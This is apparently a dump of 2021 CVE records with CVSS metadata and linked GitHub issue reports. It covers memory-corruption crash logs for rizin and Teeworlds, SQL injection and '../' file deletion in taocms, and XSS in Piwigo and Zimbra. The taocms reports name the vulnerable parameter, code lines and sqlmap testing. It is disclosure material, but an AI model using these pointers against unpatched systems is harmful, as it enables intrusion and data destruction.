"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1,
"impactScore": 6,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/rizinorg/rizin/commit/aa6917772d2f32e5a7daab25a46c72df0b5ea406"
},
{
"source": "security-advisories@github.com",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/rizinorg/rizin/issues/2083"
},
{
"source": "security-advisories@github.com",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/rizinorg/rizin/security/advisories/GHSA-hqqp-vjcm-mw8r"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/rizinorg/rizin/commit/aa6917772d2f32e5a7daab25a46c72df0b5ea406"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/rizinorg/rizin/issues/2083"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/rizinorg/rizin/security/advisories/GHSA-hqqp-vjcm-mw8r"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:rizin:rizin:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DDF54820-3CA2-49DC-9B65-DF480E8AF596",
"versionEndExcluding": null,
"versionEndIncluding": "0.3.1",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/rizinorg/rizin/issues/2083 | [
"Third Party Advisory"
] | github.com | [
"rizinorg",
"rizin"
] | ### Work environment
| Questions | Answers
|------------------------------------------------------|--------------------
| OS/arch/bits (mandatory) | Ubuntu 20.04 amd64
| File format of the file you reverse (mandatory) | ELF64
| Architecture/bits of the file (mandatory) | amd64
| `rizin -v` full output, **not truncated** (mandatory) | rizin 0.4.0-git @ linux-x86-64 commit: 5b6aaed68d84ac13de49b9400bd3bc7fe44eacbc, build: 2021-12-09__11:19:29
### Expected behavior
Analyzing binaries shouldn't trigger an OOB memory write.
### Actual behavior
There is a heap-based out of bounds write in `parse_die` when reversing an amd64 elf binary with dwarf debug info, respectively.
### Steps to reproduce the behavior
Analyze the binary attached below with aaa on an asan build to reproduce the crash.
[binary.zip](https://github.com/rizinorg/rizin/files/7686382/binary.zip)
### Additional Logs, screenshots, source code, configuration dump, ...
```
$ LD_LIBRARY_PATH=/home/faraday/rizin_dyn_asan/lib/x86_64-linux-gnu/ /home/faraday/rizin_dyn_asan/bin/rizin -TQA crashes/id\:000031\,sig\:11\,src\:028821\,time\:410419260\,op\:ext_AO\,pos\:17016
=================================================================
==61456==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200001df71 at pc 0x7f0e89427f2d bp 0x7ffcce5e6df0 sp 0x7ffcce5e6598
WRITE of size 40 at 0x60200001df71 thread T0
#0 0x7f0e89427f2c (/lib/x86_64-linux-gnu/libasan.so.5+0x67f2c)
#1 0x7f0e85fb9f99 in parse_die ../librz/bin/dwarf.c:1730
#2 0x7f0e85fbaad3 in parse_comp_unit ../librz/bin/dwarf.c:1822
#3 0x7f0e85fbbdb4 in parse_info_raw ../librz/bin/dwarf.c:1955
#4 0x7f0e85fbcebe in rz_bin_dwarf_parse_info ../librz/bin/dwarf.c:2109
#5 0x7f0e857f436c in rz_core_bin_apply_dwarf ../librz/core/cbin.c:694
#6 0x7f0e857f103f in rz_core_bin_apply_info ../librz/core/cbin.c:316
#7 0x7f0e857f1611 in rz_core_bin_apply_all_info ../librz/core/cbin.c:369
#8 0x7f0e85848fc3 in rz_core_file_do_load_for_io_plugin ../librz/core/cfile.c:712
#9 0x7f0e8584afed in rz_core_bin_load ../librz/core/cfile.c:940
#10 0x7f0e8905abdd in rz_main_rizin ../librz/main/rizin.c:1128
#11 0x55a1564cd9bd in main ../binrz/rizin/rizin.c:57
#12 0x7f0e88e650b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
#13 0x55a1564cd2ed in _start (/home/faraday/rizin_dyn_asan/bin/rizin+0x22ed)
0x60200001df71 is located 0 bytes to the right of 1-byte region [0x60200001df70,0x60200001df71)
allocated by thread T0 here:
#0 0x7f0e894cddc6 in calloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10ddc6)
#1 0x7f0e85fb5b47 in init_die ../librz/bin/dwarf.c:1223
#2 0x7f0e85fba990 in parse_comp_unit ../librz/bin/dwarf.c:1816
#3 0x7f0e85fbbdb4 in parse_info_raw ../librz/bin/dwarf.c:1955
#4 0x7f0e85fbcebe in rz_bin_dwarf_parse_info ../librz/bin/dwarf.c:2109
#5 0x7f0e857f436c in rz_core_bin_apply_dwarf ../librz/core/cbin.c:694
#6 0x7f0e857f103f in rz_core_bin_apply_info ../librz/core/cbin.c:316
#7 0x7f0e857f1611 in rz_core_bin_apply_all_info ../librz/core/cbin.c:369
#8 0x7f0e85848fc3 in rz_core_file_do_load_for_io_plugin ../librz/core/cfile.c:712
#9 0x7f0e8584afed in rz_core_bin_load ../librz/core/cfile.c:940
#10 0x7f0e8905abdd in rz_main_rizin ../librz/main/rizin.c:1128
#11 0x55a1564cd9bd in main ../binrz/rizin/rizin.c:57
#12 0x7f0e88e650b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
SUMMARY: AddressSanitizer: heap-buffer-overflow (/lib/x86_64-linux-gnu/libasan.so.5+0x67f2c)
Shadow bytes around the buggy address:
0x0c047fffbb90: fa fa fd fa fa fa fa fa fa fa fd fa fa fa fa fa
0x0c047fffbba0: fa fa fd fa fa fa fd fa fa fa fd fd fa fa fa fa
0x0c047fffbbb0: fa fa fd fa fa fa fa fa fa fa fd fd fa fa fd fa
0x0c047fffbbc0: fa fa fa fa fa fa fd fa fa fa fa fa fa fa fd fa
0x0c047fffbbd0: fa fa fa fa fa fa fd fa fa fa fa fa fa fa fd fa
=>0x0c047fffbbe0: fa fa fa fa fa fa fd fa fa fa fd fd fa fa[01]fa
0x0c047fffbbf0: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fd
0x0c047fffbc00: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fd
0x0c047fffbc10: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fd
0x0c047fffbc20: fa fa fd fd fa fa fd fd fa fa fd fa fa fa fd fd
0x0c047fffbc30: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==61456==ABORTING
```
The issue seems to be that at `dwarf.c:1223` the line `die->attr_values = calloc(sizeof(RzBinDwarfAttrValue), attr_count);` gets executed with `attr_count` equal to 0, so this is equivalent to a `malloc(0)` (I think in this case a chunk with the smallest allocatable size is returned, which should be around 16 or 32 bytes, but in `dwarf.c:1730` a die_attribute gets written, which is 40 bytes in size).
This happens because in `dwarf.c:1729` the loop gets run `attr_count - 1` times, but as `abbrev->count` is 0 and is of type `size_t` this results in an undeflow which then triggers the OOB write. | Heap-based OOB write when parsing dwarf die info | https://api.github.com/repos/rizinorg/rizin/issues/2083/comments | 4 | 2021-12-09T15:44:16Z | 2021-12-10T14:55:59Z | https://github.com/rizinorg/rizin/issues/2083 | 1,075,719,455 | 2,083 | 2,856 |
CVE-2021-45014 | 2021-12-14T14:15:09.453 | There is an upload sql injection vulnerability in the background of taocms 3.0.2 in parameter id:action=cms&ctrl=update&id=26 | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/taogogo/taocms/issues/11"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/taogogo/taocms/issues/11"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:taogogo:taocms:3.0.2:*:*:*:*:*:*:*",
"matchCriteriaId": "AA84748C-B58B-4A72-A527-7FF567BACCC2",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/taogogo/taocms/issues/11 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"taogogo",
"taocms"
] | 1.The location of the vulnerability is line 59 in taocms\include\Model\Cms.php, and the incoming sql statement in the update() method does not use intval to process id
The location of the vulnerability is line 59 in taocms\include\Model\Cms.php, and the incoming sql statement in the update() method does not use intval to process id

2.Log in to the background as the default account admin.


3.You can see action=cms&ctrl=update&id=26, this id is the id in the update method in the Cms.php file



3.Test using the SQLMap tool

| There is SQL blind injection at "Management article" | https://api.github.com/repos/taogogo/taocms/issues/11/comments | 0 | 2021-12-11T13:20:17Z | 2021-12-11T13:20:17Z | https://github.com/taogogo/taocms/issues/11 | 1,077,535,963 | 11 | 2,857 |
CVE-2021-45015 | 2021-12-14T14:15:09.493 | taocms 3.0.2 is vulnerable to arbitrary file deletion via taocms\include\Model\file.php from line 60 to line 72. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.4,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 4.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.2,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/taogogo/taocms/issues/12"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/taogogo/taocms/issues/12"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:taogogo:taocms:3.0.2:*:*:*:*:*:*:*",
"matchCriteriaId": "AA84748C-B58B-4A72-A527-7FF567BACCC2",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"22"
] | 22 | https://github.com/taogogo/taocms/issues/12 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"taogogo",
"taocms"
] | 1.The location of the vulnerability is in taocms\include\Model\file.php from line 60 to line 72 and line 64 to determine whether the incoming folder is empty. Delete the empty folder. If it is not empty, it will not be deleted, but the incoming folder will not be deleted. File filtering.. And / although it is not possible to delete non-empty folders, but you can delete any file

2.Create a new file on disk d to delete it

3.Enter the background to find the file management function and find a file to delete


4.1.txt in the D drive directory and successfully deleted, it proves that you can indeed use ../ to jump to the directory to operate any file, but you need to pay attention to the folder can only delete empty folders

| exist is an arbitrary file delete vulnerability | https://api.github.com/repos/taogogo/taocms/issues/12/comments | 0 | 2021-12-11T13:39:25Z | 2021-12-11T13:39:25Z | https://github.com/taogogo/taocms/issues/12 | 1,077,540,531 | 12 | 2,858 |
CVE-2021-40882 | 2021-12-14T18:15:08.490 | A Cross Site Scripting (XSS) vulnerability exists in Piwigo 11.5.0 via the system album name and description of the location. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Piwigo/Piwigo/issues/1477"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/Piwigo/Piwigo/issues/1477"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:piwigo:piwigo:11.5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B6BC6DF8-D938-4413-B4C7-132BCC938E68",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/Piwigo/Piwigo/issues/1477 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"Piwigo",
"Piwigo"
] | Description:
Piwigo system album name and description of the location can be written to XSS code, resulting in persistent cross-site scripting attacks
Vulnerable Instances:


| Persistent cross-site scripts in Piwigo system album properties (version: 11.5.0) | https://api.github.com/repos/Piwigo/Piwigo/issues/1477/comments | 1 | 2021-09-07T03:39:07Z | 2021-12-21T10:02:22Z | https://github.com/Piwigo/Piwigo/issues/1477 | 989,561,835 | 1,477 | 2,859 |
CVE-2021-43518 | 2021-12-15T15:15:10.857 | Teeworlds up to and including 0.7.5 is vulnerable to Buffer Overflow. A map parser does not validate m_Channels value coming from a map file, leading to a buffer overflow. A malicious server may offer a specially crafted map that will overwrite client's stack causing denial of service or code execution. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/teeworlds/teeworlds/issues/2981"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JIYZ7EVY6NZBM7FQF6GVUARYO6MKSEAT/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OS2LI2RHQNUKUT3FKWYHRC27PLRWCHMZ/"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://mmmds.pl/fuzzing-map-parser-part-1-teeworlds/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/teeworlds/teeworlds/issues/2981"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JIYZ7EVY6NZBM7FQF6GVUARYO6MKSEAT/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OS2LI2RHQNUKUT3FKWYHRC27PLRWCHMZ/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://mmmds.pl/fuzzing-map-parser-part-1-teeworlds/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:teeworlds:teeworlds:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B1524405-ED06-4440-A464-7F33F5871E18",
"versionEndExcluding": null,
"versionEndIncluding": "0.7.5",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*",
"matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:36:*:*:*:*:*:*:*",
"matchCriteriaId": "5C675112-476C-4D7C-BCB9-A2FB2D0BC9FD",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"120"
] | 120 | https://github.com/teeworlds/teeworlds/issues/2981 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"teeworlds",
"teeworlds"
] | The client crashes when an invalid map ([14.map.zip](https://github.com/teeworlds/teeworlds/files/7402713/14.map.zip)) is loaded. Such a map can be delivered to the client by a malicious server.
Tested on Ubuntu 20.04 x86_64, Teeworlds version: [f35da54b6f2c5f9fd4bbd4559f887ccf8f8cc526](https://github.com/teeworlds/teeworlds/commit/f35da54b6f2c5f9fd4bbd4559f887ccf8f8cc526)
Compilation with ASAN:
```
export CXXFLAGS="-ggdb -O0 -fsanitize=address -fno-omit-frame-pointer"
export CFLAGS="-ggdb -O0 -fsanitize=address -fno-omit-frame-pointer"
cmake ..
make
```
Run and connect to a server that delivers an invalid map:
```
./teeworlds "connect 127.0.0.1" "gfx_fullscreen 0" "gfx_screen_height 240" "gfx_screen_width 360"
[...]
=================================================================
==33805==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffffffd8f78 at pc 0x5555556fae80 bp 0x7ffffffd8e10 sp 0x7ffffffd8e00
WRITE of size 4 at 0x7ffffffd8f78 thread T0
#0 0x5555556fae7f in CMapLayers::LoadEnvPoints(CLayers const*, array<CEnvPoint, allocator_default<CEnvPoint> >&) /home/osboxes/teeworlds/teeworlds-asan/src/game/client/components/maplayers.cpp:184
#1 0x5555556fcf3b in CMapLayers::OnMapLoad() /home/osboxes/teeworlds/teeworlds-asan/src/game/client/components/maplayers.cpp:117
#2 0x555555839981 in CGameClient::OnConnected() /home/osboxes/teeworlds/teeworlds-asan/src/game/client/gameclient.cpp:459
#3 0x5555555f6755 in CClient::ProcessServerPacket(CNetChunk*) /home/osboxes/teeworlds/teeworlds-asan/src/engine/client/client.cpp:1283
#4 0x5555555f91ce in CClient::PumpNetwork() /home/osboxes/teeworlds/teeworlds-asan/src/engine/client/client.cpp:1596
#5 0x5555555f9596 in CClient::Update() /home/osboxes/teeworlds/teeworlds-asan/src/engine/client/client.cpp:1766
#6 0x5555555fc1f0 in CClient::Run() /home/osboxes/teeworlds/teeworlds-asan/src/engine/client/client.cpp:2108
#7 0x5555555d24e5 in main /home/osboxes/teeworlds/teeworlds-asan/src/engine/client/client.cpp:2704
#8 0x7ffff68e10b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
#9 0x5555555dc48d in _start (/home/osboxes/teeworlds/teeworlds-asan/build/teeworlds+0x8848d)
Address 0x7ffffffd8f78 is located in stack of thread T0 at offset 184 in frame
#0 0x5555556f949f in CMapLayers::LoadEnvPoints(CLayers const*, array<CEnvPoint, allocator_default<CEnvPoint> >&) /home/osboxes/teeworlds/teeworlds-asan/src/game/client/components/maplayers.cpp:135
This frame has 5 object(s):
[32, 36) 'Start' (line 141)
[48, 52) 'Num' (line 141)
[64, 68) 'Start' (line 151)
[80, 84) 'Num' (line 151)
[96, 184) 'p' (line 173) <== Memory access at offset 184 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow /home/osboxes/teeworlds/teeworlds-asan/src/game/client/components/maplayers.cpp:184 in CMapLayers::LoadEnvPoints(CLayers const*, array<CEnvPoint, allocator_default<CEnvPoint> >&)
Shadow bytes around the buggy address:
0x10007fff3190: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10007fff31a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10007fff31b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10007fff31c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10007fff31d0: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 f8 f2 f8 f2
=>0x10007fff31e0: 04 f2 04 f2 00 00 00 00 00 00 00 00 00 00 00[f3]
0x10007fff31f0: f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00
0x10007fff3200: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1
0x10007fff3210: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f3
0x10007fff3220: f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00
0x10007fff3230: 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 f2
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==33805==ABORTING
```
Compilation without ASAN:
```
export CXXFLAGS="-ggdb -O0"
export CFLAGS="-ggdb -O0"
cmake ..
make
```
Run and connect to a server that delivers an invalid map:
```
./teeworlds "connect 127.0.0.1" "gfx_fullscreen 0" "gfx_screen_height 240" "gfx_screen_width 360"
[...]
Segmentation fault (core dumped)
``` | Stack buffer overflow (write) while loading map in CMapLayers::LoadEnvPoints, maplayers.cpp:184 | https://api.github.com/repos/teeworlds/teeworlds/issues/2981/comments | 2 | 2021-10-23T10:33:38Z | 2022-02-03T03:17:42Z | https://github.com/teeworlds/teeworlds/issues/2981 | 1,034,135,845 | 2,981 | 2,860 |
CVE-2020-18984 | 2021-12-15T23:15:08.693 | A reflected cross-site scripting (XSS) vulnerability in the zimbraAdmin/public/secureRequest.jsp component of Zimbra Collaboration 8.8.12 allows unauthenticated attackers to execute arbitrary web scripts or HTML via a host header injection. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/buxu/bug/issues/2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/buxu/bug/issues/2"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:synacor:zimbra_collaboration_suite:8.8.12:-:*:*:*:*:*:*",
"matchCriteriaId": "9B49E1CC-2362-4B1A-AED7-B8F857EB0D8C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/buxu/bug/issues/2 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"buxu",
"bug"
] | Affected product: Zimbra Collaboration
Version testing: 8.8.12 (latest version)
Affected function: privated for fixing
PoC; privated for fixing
